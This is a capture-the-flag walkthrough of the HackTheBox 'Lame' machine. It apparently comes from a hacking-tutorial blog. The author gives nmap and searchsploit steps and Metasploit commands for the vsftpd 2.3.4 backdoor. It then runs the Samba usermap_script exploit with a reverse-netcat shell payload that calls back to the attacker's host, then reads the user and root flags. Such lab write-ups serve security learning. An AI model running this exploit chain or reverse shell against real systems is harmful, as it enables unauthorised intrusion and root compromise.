Lame HackTheBox Walkthrough

This is Lame HackTheBox Walkthrough. In this writeup, I have demonstrated how I rooted Lame HackTheBox Machine in very simple language. Before starting let us know something about this machine. It is a Linux
machine with difficulty level low
assigned by it’s maker and has been assigned IP address 10.10.10.3
. This machine is retired
so you will require VIP
subscription to access this machine.
So first of all connect your PC with VPN and confirm the connectivity by pinging the IP address 10.10.10.3. If you are not able to ping lame machine after connecting to VPN make sure lame machine is running on the lab. Start the machine first, if it is not running then ping it again. If all correct then start hacking the machine.
I started by scanning
the machine. For this purpose, a port scanner is used [we generally scan the machine so that we can banner grab
the services running over it and this gives us an idea how to proceed further]. Nmap
(a well-known port scanner) gave the following result.
Scanning
$ nmap -sC -sV -oN lame_scan 10.10.10.3

Nmap scan revealed that ports 21
, 22
, 139
and 445
are open. FTP
is running over port 21, SSH
is running over 22 and SMB
is running over ports 139 & 445. As soon as we get some open ports and services running over them, our next step should be to enumerate each services in depth so that we can get some useful information from them.
vsftpd 2.3.4
server is running over port 21. So lets us check if any exploit is present for this version. Used searchsploit
tool to search available exploit for vsftpd
service. Searchsploit gave the following result.
$ searchsploit vsftpd 2.3.4
#This will search available exploit over exploit-db.com

According to the result, vsftpd 2.3.4
service has a metasploit module which allows Backdoor Command Execution. So used metasploit tool to execute this exploit.
$ msfdb run
# To start metasploit-framework along with database
msf5 > search vsftpd
msf5 > use exploit/unix/ftp/vsftpd_234_backdoor
msf5 > set payload cmd/unix/interact
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.10.3
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

Although vsFTPd 2.3.4
is vulnerable but no session created after exploit execution. This may be because it requires password or admin has blocked to run exploit over port 21. Left it here and moved forward for further enumeration. Nmap default script ftp-anon
revealed that anonymous login is allowed. So tried to login anonymously using credential anonymous:anything
. Logged in successfully. Then tried to list folder content but it appears that ftp folder is empty
. Even couldn’t change the current directory.
$ ftp 10.10.10.3
~anonnymous
~anything

Left it here and then moved to enumerate services on next port. Samba 3.0.20
is running on port 445 according to smb-os-discovery
nmap script. So as usual, my next step is to search the public exploit for the given version 3.0.20. Searched using searchsploit for available exploits.
$searchsploit samba 3.0.20

According to the above result, a metasploit module named usermap_script
is present. So used this exploit and successfully got command shell
after exploitation.
msf5 > search usermap_script
msf5 > use exploit/multi/samba/usermap_script
msf5 > set payload cmd/unix/reverse_netcat
msf5 exploit(multi/samba/usermap_script) > set RHOST 10.10.10.3
msf5 exploit(multi/samba/usermap_script) > set LHOST 10.10.14.5
msf5 exploit(multi/samba/usermap_script) > exploit

We got a shell. However, the shell is not in form of shell prompt
or fully qualified Linux shell. So upgraded the shell using python
Upgrading the Shell
$which python
//To check whether python is installed on remote machine
$shell
// To get a shell prompt

We have upgraded the shell. Now it is time to capture the flag.
Note: We can notice that we are root after getting shell, which means we have full permission to do anything. Moreover, our shell is root shell and we do not require
privilege escalation
any more.
Capture User Flag
$cat /home/makis/user.txt

Capture Root Flag
$cat /root/root.txt

This was how I rooted Lame HackTheBox machine. This was very simple box. Hope you guys have liked my methodology and have learnt some new things. Share your experience with us by commenting. And for any help & suggestion related to walkthrough feel free to write us at [email protected].
Liked this walkthrough check out our active machine writeups at https://ethicalhacs.com/. Next upcoming walkthrough is Legacy.